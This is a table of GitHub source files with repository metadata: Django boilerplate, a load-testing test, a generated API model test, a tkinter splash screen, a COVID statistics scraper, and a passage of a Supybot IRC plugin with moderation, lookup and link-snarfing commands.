blob_id | directory_id | path | content_id | detected_licenses | license_type | repo_name | snapshot_id | revision_id | branch_name | visit_date | revision_date | committer_date | github_id | star_events_count | fork_events_count | gha_license_id | gha_event_created_at | gha_created_at | gha_language | src_encoding | language | is_vendor | is_generated | length_bytes | extension | content | authors | author
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3040254d9e002106e561ff20aa92098f99b38eee | 6e77e4956005e3c0906dd9bc78e17026293d26a7 | /manage.py | e7b080c346adb3fef80260f72f6ab15f452d031d | [] | no_license | lenines/djangoAD | 191bdc4ebbdaa2ba5aa86e6bda55daff39cda4f6 | 11b8f1396e75592ff9c0d8f80610c87ea3d5c148 | refs/heads/master | 2020-06-04T22:39:54.490867 | 2014-05-14T18:35:25 | 2014-05-14T18:35:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoAD.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
c4029a02879afac1579de64ece60784d40003ce5 | 7144d29d32343bd35a9fc9f169fed0eac9817a14 | /banner/urls.py | cc4af951984d3a6f49e0bf9b27b2585654f2dee8 | [] | no_license | spectatorqq/backstage-management-system | 3f030f6f42311d81bdccb931581c02f2dca2171b | 5086e97a65cead40e30426ed3c551c9378b57068 | refs/heads/master | 2020-09-20T04:00:43.718967 | 2019-11-27T08:42:12 | 2019-11-27T08:42:12 | 224,371,525 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | from django.urls import path
from banner import views
urlpatterns = [
path('save_banner/', views.save_banner),
path('show_current_page/', views.show_current_page),
path('edit_carousel/', views.edit_carousel)
] | [
"[email protected]"
] | |
779f02e54dec316aae91f2c3db6455f6aea08182 | 4f718b014cd56215979a466c2ef3f2b6a82fbec1 | /venv/Scripts/django-admin.py | 600fb92973f9ab329362ba0bd7cd953c944b9382 | [] | no_license | carminejcorbo/CS416FPDeployment | 8a9bc9567ac8cc09a76b863ac76a6e8ccce87bbb | 58ffb539ee24fc870cb89a74cf10d8dbef8aa34a | refs/heads/master | 2023-02-23T03:52:28.575863 | 2023-01-04T19:00:41 | 2023-01-04T19:00:41 | 225,298,683 | 0 | 0 | null | 2023-02-07T21:23:27 | 2019-12-02T06:10:49 | Python | UTF-8 | Python | false | false | 164 | py | #!C:\Django Workspace\FreshShirts\venv\Scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"[email protected]"
] | |
09976773a29250a9dfcd0ec12efbc745d44041f3 | 8750c559722f1dc63d31f2df293a7d4feb71fc09 | /molotov/tests/test_slave.py | b6e47aa94ec42664075fa8dd0387322de09b4ed6 | [
"Apache-2.0"
] | permissive | ymoran00/molotov | 4f8017a90fd71c412f08355db98c72ea106ae8bf | 2533d9653160845bd9a40defcf2e39810ad80215 | refs/heads/master | 2020-08-17T22:00:31.724709 | 2019-12-16T09:53:11 | 2019-12-16T09:53:11 | 215,716,155 | 0 | 0 | Apache-2.0 | 2019-10-17T06:11:04 | 2019-10-17T06:11:03 | null | UTF-8 | Python | false | false | 1,123 | py | import os
import pytest
from molotov import __version__
from molotov.slave import main
from molotov.tests.support import TestLoop, dedicatedloop, set_args
_REPO = "https://github.com/loads/molotov"
NO_INTERNET = os.environ.get("NO_INTERNET") is not None
@pytest.mark.skipif(NO_INTERNET, reason="This test requires internet access")
class TestSlave(TestLoop):
@dedicatedloop
def test_main(self):
with set_args("moloslave", _REPO, "test") as out:
main()
if os.environ.get("TRAVIS") is not None:
return
output = out[0].read()
self.assertTrue("Preparing 1 worker..." in output, output)
self.assertTrue("OK" in output, output)
@dedicatedloop
def test_fail(self):
with set_args("moloslave", _REPO, "fail"):
self.assertRaises(Exception, main)
@dedicatedloop
def test_version(self):
with set_args("moloslave", "--version") as out:
try:
main()
except SystemExit:
pass
version = out[0].read().strip()
self.assertTrue(version, __version__)
| [
"[email protected]"
] | |
fdbc22579dbfd729a9c7cf738cd5dbd3f54004a6 | 2eae961147a9627a2b9c8449fa61cb7292ad4f6a | /test/test_migration_tax_return.py | 5ba3369f4cd1b2ccbec9996ca4e1a387c408f536 | [] | no_license | kgr-eureka/SageOneSDK | 5a57cc6f62ffc571620ec67c79757dcd4e6feca7 | 798e240eb8f4a5718013ab74ec9a0f9f9054399a | refs/heads/master | 2021-02-10T04:04:19.202332 | 2020-03-02T11:11:04 | 2020-03-02T11:11:04 | 244,350,350 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,941 | py | # coding: utf-8
"""
Sage Business Cloud Accounting - Accounts
Documentation of the Sage Business Cloud Accounting API. # noqa: E501
The version of the OpenAPI document: 3.1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import openapi_client
from openapi_client.models.migration_tax_return import MigrationTaxReturn # noqa: E501
from openapi_client.rest import ApiException
class TestMigrationTaxReturn(unittest.TestCase):
"""MigrationTaxReturn unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test MigrationTaxReturn
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = openapi_client.models.migration_tax_return.MigrationTaxReturn() # noqa: E501
if include_optional :
return MigrationTaxReturn(
legacy_id = 56,
id = '0',
displayed_as = '0',
path = '0',
created_at = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
updated_at = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
from_date = datetime.datetime.strptime('1975-12-30', '%Y-%m-%d').date(),
to_date = datetime.datetime.strptime('1975-12-30', '%Y-%m-%d').date(),
tax_return_frequency = openapi_client.models.base.Base(
legacy_id = 56,
id = '0',
displayed_as = '0',
__path = '0', ),
total_amount = 1.337,
gb = openapi_client.models.gb_box_data.GBBoxData(
box_1 = 1.337,
box_2 = 1.337,
box_3 = 1.337,
box_4 = 1.337,
box_5 = 1.337,
box_6 = 1.337,
box_7 = 1.337,
box_8 = 1.337,
box_9 = 1.337, ),
ie = openapi_client.models.ie_box_data.IEBoxData(
box_t1 = 1.337,
box_t2 = 1.337,
box_t3 = 1.337,
box_t4 = 1.337,
box_e1 = 1.337,
box_e2 = 1.337,
box_es1 = 1.337,
box_es2 = 1.337, )
)
else :
return MigrationTaxReturn(
)
def testMigrationTaxReturn(self):
"""Test MigrationTaxReturn"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
35fbc68d5d7a092f36ad7817eb98d630e7078ff9 | 0698da9cae7d49222742d99daf3cc2b1b618501c | /LoadingBar.py | d8f2efa5e2d8382fc0915b4dc5228726b35e415c | [] | no_license | Ahmad-Kaafi/Facial-recognition-project | deee4a9b1dac278194e9a0ee54e74f1ef5acc2d1 | 90ce3ecfcbb86e44df8d79beab1d32018b499afb | refs/heads/master | 2020-04-28T12:21:10.259381 | 2019-03-25T18:06:44 | 2019-03-25T18:06:44 | 175,272,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,045 | py | from tkinter import *
from PIL import Image, ImageTk
from tkinter import ttk  # Python 3 location of the themed widgets; bare "import ttk" is the Python 2 name
class DemoSplashScreen:
def __init__(self, parent):
self.parent = parent
self.aturSplash()
self.aturWindow()
def aturSplash(self):
self.gambar = Image.open("Green.png")
self.imgSplash = ImageTk.PhotoImage(self.gambar)
def aturWindow(self):
lebar, tinggi = self.gambar.size
setengahLebar = (self.parent.winfo_screenwidth()-lebar)//2
setengahTinggi = (self.parent.winfo_screenheight()-tinggi)//2
self.parent.geometry("%ix%i+%i+%i"%(lebar, tinggi, setengahLebar, setengahTinggi))
Label(self.parent, image = self.imgSplash).pack()
if __name__ == "__main__":
root = Tk()
root.overrideredirect(True)
progressbar = ttk.Progressbar(orient=HORIZONTAL, length=10000, mode='determinate')
progressbar.pack(side="bottom")
app = DemoSplashScreen(root)
progressbar.start()
root.after(1000, root.destroy)
root.mainloop()
| [
"[email protected]"
] | |
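The splash window is centered by the `geometry("%ix%i+%i+%i")` call (width x height plus x/y offsets). A standalone check of that arithmetic, with made-up screen and window sizes rather than anything queried from Tk:

```python
# Assumed sizes, for illustration only.
lebar, tinggi = 400, 200             # window width / height
screen_w, screen_h = 800, 600        # pretend screen resolution
x = (screen_w - lebar) // 2          # 200 px from the left centers horizontally
y = (screen_h - tinggi) // 2         # 200 px from the top centers vertically
print("%ix%i+%i+%i" % (lebar, tinggi, x, y))  # -> 400x200+200+200
```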
2f70ec7d64d3e0d0ef8953864baafa9c81fbf3fa | a34a580a222eeda9fb0230bdf257f2c65b7bc72a | /Develop/psjDevelop/searchFY.py | d0d7447db89fa782ccd7b50e6bd0b41aaf23b8fb | [] | no_license | diwangtseb/COVvisualization | 3551dc91f8d2b71f631fdd52755d33be2c8d982c | ccc0c4aef1868b0ed6bf81406ce843045c426ff6 | refs/heads/master | 2022-04-09T09:06:43.878526 | 2020-03-08T07:24:04 | 2020-03-08T07:24:04 | 245,126,818 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,190 | py | import requests
import json
import time
def GetDetailsData(url, headers):
"""
爬取数据
:param url:
:param headers:
:return:
"""
r = requests.get(url, headers=headers)  # headers must be passed by keyword; positionally it would be read as params
res = json.loads(r.text)
data_all = json.loads(res['data'])
details = [] # detailed per-city data for the current day
update_time = data_all["lastUpdateTime"]
data_country = data_all["areaTree"] # list of 25 countries
data_province = data_country[0]["children"] # the provinces of China
for pro_infos in data_province:
province = pro_infos["name"]
for city_infos in pro_infos["children"]:
city = city_infos["name"]
confirm = city_infos["total"]["confirm"]
confirm_add = city_infos["today"]["confirm"]
heal = city_infos["total"]["heal"]
dead = city_infos["total"]["dead"]
details.append([update_time, province, city, confirm, confirm_add, heal, dead])
return details
def GetHistoryData(url, headers):
"""
爬取数据
:param url:
:param headers:
:return:
"""
r = requests.get(url, headers=headers)  # same keyword fix as in GetDetailsData
res = json.loads(r.text)
data_all = json.loads(res['data'])
history = {} # historical day-by-day data
for i in data_all["chinaDayList"]:
ds = "2020."+i["date"]
tup = time.strptime(ds, "%Y.%m.%d")
ds = time.strftime("%Y-%m-%d", tup) # reformat the date string because the database column is datetime
confirm = i["confirm"]
suspect = i["suspect"]
heal = i["heal"]
dead = i["dead"]
history[ds] = {"confirm": confirm, "suspect": suspect, "heal": heal, "dead": dead,
"confirm_add": 0, "suspect_add": 0, "heal_add": 0, "dead_add": 0}
for i in data_all["chinaDayAddList"]:
ds = "2020." + i["date"]
tup = time.strptime(ds, "%Y.%m.%d")
ds = time.strftime("%Y-%m-%d", tup) # reformat the date string because the database column is datetime
confirm = i["confirm"]
suspect = i["suspect"]
heal = i["heal"]
dead = i["dead"]
history[ds].update({"confirm_add": confirm, "suspect_add": suspect, "heal_add": heal, "dead_add": dead})
return history
| [
"[email protected]"
] | |
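Neither function is invoked in the file itself. A hypothetical driver is sketched below; the endpoint URL and headers are assumptions (scrapers of this shape usually hit Tencent's `getOnsInfo` feed), not values taken from the code:

```python
# Hypothetical usage; URL and headers are assumed, not from the file.
url = "https://view.inews.qq.com/g2/getOnsInfo?name=disease_h5"
headers = {"User-Agent": "Mozilla/5.0"}

details = GetDetailsData(url, headers)
print(details[0])   # [update_time, province, city, confirm, confirm_add, heal, dead]

history = GetHistoryData(url, headers)
last_day = sorted(history)[-1]
print(last_day, history[last_day])
```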
9dc27008134db0b35326d29d2df481dd1ecbf194 | df241cd4aacb97fb5562a08ea4f912e9bd348657 | /list5/toy_story.py | 4e62b77003fe671c41f33424d82178dab0e6001f | [] | no_license | jakubdabek/python-uni | a8c7a323b1389fbe46e96b3c5fe9d4f1a5e825ec | 0380bbce5f42a7b8cce2f678986c48b17b40f0a9 | refs/heads/master | 2022-11-18T18:59:55.229564 | 2020-07-05T17:42:12 | 2020-07-05T18:01:25 | 244,458,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,467 | py | from pathlib import Path
from typing import Union, Optional, Tuple
from sklearn.linear_model import LinearRegression
from matplotlib import pyplot as plt
from list4.overload import flatten
import pandas as pd
import numpy as np
def load_data(file_name: str, *, dir_path: Optional[Union[Path, str]] = None) -> pd.DataFrame:
if dir_path is None:
dir_path = Path(__file__).parent / 'ml-latest-small'
elif not isinstance(dir_path, Path):
dir_path = Path(dir_path)
return pd.read_csv(dir_path / file_name)
def load_movies_find_id(title: str) -> Tuple[pd.Series, int]:
movies = load_data("movies.csv")
return movies["movieId"], movies.loc[movies["title"] == title, "movieId"][0]
def relevant_data(ratings: pd.DataFrame, movie_ids: pd.Series, movie_id: Optional[int], max_movie_id: int) -> pd.DataFrame:
ratings = ratings.drop('timestamp', axis=1)
ratings = ratings[ratings['movieId'] <= max_movie_id]
ratings = pd.pivot_table(ratings, index='userId', columns='movieId', values='rating')
ratings = ratings.reindex(columns=movie_ids[movie_ids <= max_movie_id], copy=False)
if movie_id is not None:
ratings = ratings[ratings[movie_id].notna()]
ratings.fillna(0.0, inplace=True)
return ratings
def linear_regression_dataset(ratings: pd.DataFrame, movie_id: int, *, inplace=False) -> Tuple[pd.DataFrame, pd.Series]:
movie_ratings = ratings[movie_id]
return ratings.drop(movie_id, axis=1, inplace=inplace), movie_ratings
def main():
movie_ids, toy_story_id = load_movies_find_id("Toy Story (1995)")
ratings = load_data("ratings.csv")
max_movie_ids = pd.Series(flatten([10**i, 10**i * 2, 10**i * 5] for i in range(1, 6)))
# max_movie_ids = [200]
# max_movie_ids = [10, 100, 200, 500, 1000, 2500, 5000, 7500, 10000]
bound = len(max_movie_ids[max_movie_ids < movie_ids.max()])
max_movie_ids = max_movie_ids[:bound+1]
scores = []
for max_movie_id in max_movie_ids:
data = relevant_data(ratings, movie_ids, toy_story_id, max_movie_id)
(_, toy_story) = linear_regression_dataset(data, toy_story_id, inplace=True)
lr: LinearRegression = LinearRegression().fit(data, toy_story)
scores.append(lr.score(data, toy_story))
lr: LinearRegression = LinearRegression().fit(data[:-15], toy_story[:-15])
predictions: np.ndarray = lr.predict(data[-15:])
comparison = pd.DataFrame(dict(prediction=predictions, actual=toy_story[-15:]))
movies_num = len(data.columns)
print(f"{'='*8} {movies_num:6} movies {'='*8}")
print(f"score: {lr.score(data[-15:], toy_story[-15:])}")
print(comparison)
print(scores)
plt.title("model errors")
plt.plot(max_movie_ids, scores)
plt.xlabel("max movie id")
plt.ylabel("error")
plt.xscale('log')
plt.show()
plt.title("model errors")
plt.plot([len(movie_ids[movie_ids < num]) for num in max_movie_ids], scores)
plt.xlabel("number of movies")
plt.ylabel("error")
plt.xscale('log')
plt.show()
fig, ax = plt.subplots()
ax.grid(True)
xs = np.arange(len(toy_story[-15:])) + 1
ax.scatter(xs, predictions, c='coral', s=50, label='predicted')
ax.scatter(xs, toy_story[-15:], c='green', s=30, label='expected')
ax.set_title(f'Regression model prediction results ({movies_num} movies)')
ax.legend()
fig.tight_layout()
plt.show()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
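The reshaping step at the heart of `relevant_data` is `pd.pivot_table`, which turns the long `(userId, movieId, rating)` table into a wide user-by-movie matrix. A tiny illustration with invented data rather than the MovieLens files the script loads:

```python
import pandas as pd

ratings = pd.DataFrame({
    "userId":  [1, 1, 2],
    "movieId": [1, 2, 1],
    "rating":  [4.0, 3.0, 5.0],
})
wide = pd.pivot_table(ratings, index="userId", columns="movieId", values="rating")
print(wide.fillna(0.0))
# movieId    1    2
# userId
# 1        4.0  3.0
# 2        5.0  0.0
```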
fe14e2773566f9017c9e893c04fd4ab422bb744a | 5d707e323f945ed5183b342f67ee23072755ac08 | /General/plugin.py | 9081fa8c2a5cfcba4f10e2505fbbe5d77e79033c | [] | no_license | scornflakes/StewieGriffin | 1826b3f52ee2274b2daf9f4b674340a8666b09bd | 678db2f855550ae3eefb174e62b8b41fb63be359 | refs/heads/master | 2020-12-03T05:10:34.385457 | 2012-07-19T11:20:09 | 2012-07-19T11:20:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,253 | py | ###
# Copyright (c) 2011, Anthony Boot
# All rights reserved.
#
# Licenced under GPLv2
# In brief, you may edit and distribute this as you want, provided the original
# and modified sources are always available, this license notice is retained
# and the original author is given full credit.
#
# There is no warrenty or guarentee, even if explicitly stated, that this
# script is bug and malware free. It is your responsibility to check this
# script and ensure its safety.
#
###
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
import re,time,json,random
import supybot.ircmsgs as ircmsgs
import supybot.schedule as schedule
class General(callbacks.PluginRegexp):
"""Some general purpose plugins."""
threaded=True
# All regexps
# regexps=['capsKick','selfCorrect','userCorrect','saveLast','greeter','awayMsgKicker','ytSnarfer','pasteSnarfer']
#Remove from this array to disable any regexps
regexps=['selfCorrect','saveLast','greeter','awayMsgKicker','ytSnarfer','pasteSnarfer']
#Set to false to disable.
consolechannel = "##sgoutput"
buffer={}
buffsize = 10
alpha=[]
alpha+='QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm'
annoyUser=[]
random.seed()
random.seed(random.random())
kickuser={}
#####################
### Commands ###
#####################
def banmask(self, irc, msg, args, hostmask):
"""<nick|hostmask>
Gets IP based hostmask for ban. """
failed = False
ipre = re.compile(r"[0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]")
bm = ipre.search(hostmask)
try:
bm = bm.group(0)
bm = bm.replace(".","?")
bm = bm.replace("-","?")
irc.reply("*!*@*"+bm+"*")
if(self.consolechannel): irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "BANMASK: *!*@*"+bm+"* returned for "+msg.nick))
except:
hostmask = hostmask.split("@")[1]
count=0;
while count<10:
hostmask = hostmask.replace(str(count),"?")
count+=1
irc.reply("*!*@%s"%(hostmask),prefixNick=False)
if(self.consolechannel): irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "BANMASK: *!*@%s returned for %s"%(hostmask,msg.nick)))
banmask = wrap(banmask, ["hostmask"])
def rand(self,irc,msg,args,min,max,num):
"""[min] <max> [amount]
Generates a random number from [min] to <max>, [amount] number of times."""
random.seed()
random.seed(random.random())
if min > max and not num:
num = max
max = min
min = 0
elif min > max:
min,max = max,min
if not num:
num = 1
if not max:
max = min
min = 0
try:
min = int(min)
max = int(max)
num = int(num)
except:
irc.error("Non numeric value(s) given")
return 0
if num > 25:
num = 25
x = 0;
output = ""
while x < num:
output+=str(int(random.randint(min,max)))+" "
x+=1
irc.reply(output)
rand = wrap(rand,['int',optional('int'),optional('int')])
def stewieQuote(self, irc, msg, args):
data = utils.web.getUrl("http://smacie.com/randomizer/family_guy/stewie_griffin.html")
quote = data.split('<td valign="top"><big><big><big><font face="Comic Sans MS">')[1].split('</font></big></big></big></td>')[0]
irc.reply(quote,prefixNick=False)
# stewie = wrap(stewieQuote)
def geoip(self,irc,msg,args,ohostmask):
ohostmask = ohostmask.split('@')[1]
if msg.nick.lower() in ohostmask:
irc.reply('Unable to locate IP - User cloak detected (%s)' % ohostmask)
return None
ipre = re.compile(r"[0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]")
hostmask = ipre.search(ohostmask)
if hostmask:
try:
hostmask = hostmask.group(0)
hostmask = hostmask.replace("-",".")
except:
hostmask = hostmask
else:
hostmask = ohostmask
self.log.info("GeoIP: %s",hostmask)
# if 'gateway' in hostmask:
# hostmask = hostmask.split('ip.')[1]
data = utils.web.getUrl('http://infosniper.net/?ip_address=%s'%hostmask)
data = data.split('<!-- ################################################################################## -->')[5]
data = re.split('<[^<>]+>|\\n| | | | ',data)
x = 0
info = []
while x < len(data):
if data[x] is '' or (len(data[x])<2 and ' ' in data[x]) :
pass
else:
info+=[data[x]]
x+=1
country = info[20]
city = info[5]
tz = info[27]
to = info[30]
if '-' not in to:
to = '+%s'%to
lat = info[13]
lon = info[21]
provider = info[11]
if 'EUKHOST LTD' in provider:
irc.reply("Unable to locate IP - Not found")
return None
tinyurl=utils.web.getUrl('http://tinyurl.com/api-create.php?url=http://maps.google.com/maps?q=%s,%s'%(lat,lon))
irc.reply('%s is near %s in %s (%s). The timezone is %s and is UTC/GMT%s. The provider is %s'%(hostmask,city,country,tinyurl,tz,to,provider))
return None
geoip = wrap(geoip, ['hostmask'])
def report(self,irc,msg,args,user,reason):
"""<User> <reason>
Reports a user to Xenocide for him to act on when he comes back from afk or [NotHere]."""
t = time.localtime()
if int(t[2]) < 10: date = '0{0}'.format(t[2])
else: date = str(t[2])
if int(t[1]) < 10: month = '0{0}'.format(t[1])
else: month = str(t[1])
if int(t[3]) < 10: h = '0{0}'.format(t[3])
else: h = str(t[3])
logFile = '#powder.{0}-{1}-{2}.log'.format(date,month,t[0])
# irc.queueMsg(ircmsgs.privmsg('[NotHere]','User {0} has reported {1} for {2}. Log file is {3} and log time will be around {4}{5}'.format(msg.nick,user,reason,logFile,h,t[4])))
# irc.queueMsg(ircmsgs.privmsg('Xenocide','User {0} has reported {1} for {2}. Log file is {3} and log time will be around {4}{5}'.format(msg.nick,user,reason,logFile,h,t[4])))
irc.queueMsg(ircmsgs.privmsg('Memoserv','SEND Xenocide User {0} has reported {1} in {6} for {2}. Log file is {3} and log time will be around {4}{5}'.format(msg.nick,user,reason,logFile,h,t[4],msg.args[0])))
irc.replySuccess('Report sent.')
report = wrap(report,['nick','text'])
def bug(self,irc,msg,args,cmd):
"""<plugin>
Use this command when Stewie has a bug. It places a note in the logs and sends Xenocide a message."""
self.log.error("****Error in {} reported by {}****".format(cmd,msg.nick))
irc.queueMsg(ircmsgs.privmsg('Memoserv','SEND Xenocide Bug found in {} by {}.'.format(cmd,msg.nick)))
irc.replySuccess("Bug reported.")
bug = wrap(bug,['something'])
def kicked(self,irc,args,channel,nick):
"""[user]
Shows how many times [user] has been kicked and by who. If [user] isn't provided, it returns infomation based on the caller."""
if not nick: ref = msg.nick.lower()
else: ref = nick.lower()
with open('KCOUNT','r') as f:
kickdata = json.load(f)
try:
kickdata = kickdata[ref]
reply = "{} has been kicked {} times, ".format(nick, kickdata['total'])
for each in kickdata:
if each in 'total': continue
reply='{} {} by {},'.format(reply,kickdata[each],each)
irc.reply(reply[:-1].replace("o","\xF0"))
except:
irc.reply('{} hasn\'t been kicked it seems.'.format(nick))
kicked = wrap(kicked,[optional('nick')])
def annoy(self,irc,msg,args,channel,nick,mins):
"""[channel] <nick> [mins]
Makes stewie repeat everything the user says via a NOTICE for 2 minutes if [mins] is not specified. Blame Doxin for this."""
if not mins or mins == 0: mins = 2
expires = time.time()+(mins*60)
try:
def f():
self.annoyUser.pop(self.annoyUser.index(nick.lower()))
self.log.info('ANNOY -> No longer annoying {}'.format(nick))
schedule.addEvent(f,expires)
except:
irc.error("I borked.")
return 0
self.log.info('ANNOY -> Annoying {} for {} minutes'.format(nick,mins))
self.annoyUser+=[nick.lower()]
annoy = wrap(annoy,['op','nickInChannel',optional('float')])
def justme(self,irc,msg,args,url):
"""<url>
Checks if a website is up or down (using isup.me)"""
try: url = url.split("//")[1]
except: pass
data = utils.web.getUrl('http://isup.me/{}'.format(url))
if 'is up.' in data: irc.reply("It's just you.")
elif 'looks down' in data: irc.reply("It's down.")
else: irc.error("Check URL and try again")
justme = wrap(justme,(['something']))
def multikick(self,irc,msg,args,channel,nick,num,message):
"""<nick> <num> [message]
Kicks <nick> every time [s]he talks up to <num> (max 10) times with [message]. Use #n to insert number of remaining kicks."""
if not channel: channel = "#powder"
try: num = int(num)
except:
irc.error("Non-numeric value given.")
return 0
if num > 10: num = 10
nick = nick.lower()
self.kickuser[nick]={}
self.kickuser[nick]['num'] = num
if not message or message == "":
message = "#n kick(s) remaining."
self.kickuser[nick]['msg'] = message
irc.queueMsg(ircmsgs.notice(msg.nick,("Kicking anyone with {} in their nick {} times.".format(nick,num))))
multikick = wrap(multikick, ['op',('haveOp','Kick a user'),'something','something',optional('text')])
#####################
### RegExps ###
#####################
def greeter(self, irc, msg, match):
r"^(hello|hi|sup|hey|o?[bh]ai|wa+[sz]+(a+|u+)p?|Bye+|cya+|later[sz]?)[,. ]+(stewi?e?[griffin]?|bot|all|there)"
if "," in match.group(0):
hail = match.group(0).split(",")[0]
elif "." in match.group(0):
hail = match.group(0).split(".")[0]
else:
hail = match.group(0).split(" ")[0]
self.log.info("Responding to %s with %s"%(msg.nick, hail))
if(self.consolechannel): irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "GREETER: Responding to %s with %s"%(msg.nick,hail)))
irc.reply("%s, %s"%(hail,msg.nick), prefixNick=False)
greeter = urlSnarfer(greeter)
def awayMsgKicker(self, irc, msg, match):
r"(is now (set as)? away [-:(] Reason |is no longer away : Gone for|is away:)"
self.log.info("KICKING %s for away announce"%msg.nick)
if(self.consolechannel):irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "KICK: %s for away announcement (automatic)"%msg.nick))
self._sendMsg(irc, ircmsgs.kick(msg.args[0], msg.nick, "Autokick: Spam (Away/Back Announce)"))
awayMsgKicker = urlSnarfer(awayMsgKicker)
def ytSnarfer(self, irc, msg, match):
r".+youtube[.]com.+v=[0-9A-z\-_]{11}.*"
self.log.info("ytSnarfer - Active")
url = match.group(0)
url = url.split(" ")
for x in url:
if "youtu" in x:
url = url[url.index(x)]
if url.find("v=") != -1 or url.find("&") != -1:
if url.find("v=") != -1:
url = url.split("v=")[1]
if url.find("&") != -1:
url = url.split("&")[0]
else:
url = url[-11:]
self.log.info("ytSnarfer - Video ID: %s"%(url))
url="http://www.youtube.com/watch?v="+url
data = utils.web.getUrl(url)
# data = data.split("‪")[1].split("‬")[0]
data = data.split('<title>')[1].split('</title>')[0].split('\n')[1].strip()
data = data.replace(""","\'").replace("'", "'").replace("&","&")
irc.reply('Youtube video is "%s"'%data, prefixNick=False)
self.log.info("ytSnarfer - Done.")
if(self.consolechannel):irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "%s is %s"%(url,data)))
return None
ytSnarfer = urlSnarfer(ytSnarfer)
def capsKick(self,irc,msg,match):
r".+"
data = match.group(0)
data=data.strip('\x01ACTION').strip('\x01').strip('\x02').strip('\x07').strip('\x0f')
knownCapsNicks = ['UBERNESS','ADL']
for each in knownCapsNicks:
data = data.strip(each)
data = list(data)
if len(data) < 15: return 0 #Simon: Increased from 5 to 15, was making quite a few people unhappy
length=0
caps=0
for each in data:
if each in self.alpha:
length+=1
if each in each.upper():
caps+=1
self.log.warning('{0} {1} {2}'.format(length,caps,int((float(caps)/length)*100)))
if int((float(caps)/length)*100) > 60:
self.log.info('Kicking {0} from {1} for caps rage.'.format(msg.nick,msg.args[0]))
if(self.consolechannel):irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "KICK: %s for excessive caps. (automatic)"%msg.nick))
with open('KCOUNT','r') as f:
kd = json.load(f)
with open('KCOUNT','w') as f:
try: kd[msg.nick.lower()]+=1
except: kd[msg.nick.lower()]=1
f.write(json.dumps(kd,sort_keys=True,indent=4))
reason='{0} - Kicked {1} time'.format('Excessive Caps',kd[msg.nick.lower()])
if kd[msg.nick.lower()] > 1:
reason = '{0}s'.format(reason)
del kd
irc.queueMsg(ircmsgs.kick(msg.args[0], msg.nick, reason))
capsKick = urlSnarfer(capsKick)
def pasteSnarfer(self,irc,msg,match):
r"http://pastebin[.]com/[A-Za-z0-9]{8}"
url = match.group(0)
self.log.info('Pastbin Found - {0}'.format(url))
page = utils.web.getUrl(url)
paste={}
paste['name']=page.split('<h1>')[1].split('</h1>')[0]
page = page.split('<div class="paste_box_line2">')[1].split('</div>')[0].strip().split('|')
try:
paste['by']=page[0].split('">')[1].split('</a>')[0]
except:
paste['by']=page[0].split(':')[1]
paste['date']=page[1][1:-1]
paste['syntax']=page[2].split('>')[1].split('<')[0]
paste['size']=page[3].split(':')[1][1:-1]
paste['expires']=page[5].split(':')[1][1:]
if 'None' in paste['syntax']: paste['syntax']='Plain Text'
irc.reply('Pastebin is {0} by {1} posted on {2} and is written in {3}. The paste is {4} and expires {5}'.format(paste['name'],paste['by'],paste['date'],paste['syntax'],paste['size'],paste['expires']),prefixNick=False)
pasteSnarfer = urlSnarfer(pasteSnarfer)
def selfCorrect(self,irc,msg,match):
r"^s[/].*[/].*$"
match = match.group(0)
data = match.split('/')
newData = []
x=0
while x < len(data):
if '\\' in data[x]:
newData+=['{0}/{1}'.format(data[x][:-1],data[x+1])]
x+=2
else:
newData+=[data[x]]
x+=1
data=newData
channel = msg.args[0]
for each in self.buffer[channel]:
if msg.nick in each[0]:
output = each[1]
if (len(data)-1)%2 is 0:
x=1
while x < len(data):
output=output.replace(data[x],data[x+1])
x+=2
self.log.info('Changing {0} to {1}'.format(each[1],output))
irc.reply('<{0}> {1}'.format(each[0],output),prefixNick=False)
return 0
irc.error('Not found in buffer')
selfCorrect = urlSnarfer(selfCorrect)
def userCorrect(self,irc,msg,match):
r"^u[/].*[/].*[/].*$"
match = match.group(0)
data = match.split('/')
user = data[1]
newData = []
x=0
while x < len(data):
if '\\' in data[x]:
newData+=['{0}/{1}'.format(data[x][:-1],data[x+1])]
x+=2
else:
newData+=[data[x]]
x+=1
data=newData
channel = msg.args[0]
for each in self.buffer[channel]:
print user.lower(), each[0].lower(), user.lower() == each[0].lower()  # compare values, not identity
if user.lower() in each[0].lower():
output = each[1]
x=2
try:
while x < len(data):
output=output.replace(data[x],data[x+1])
x+=2
except: irc.error('Not enough arguments')
self.log.info('Changing {0} to {1}'.format(each[1],output))
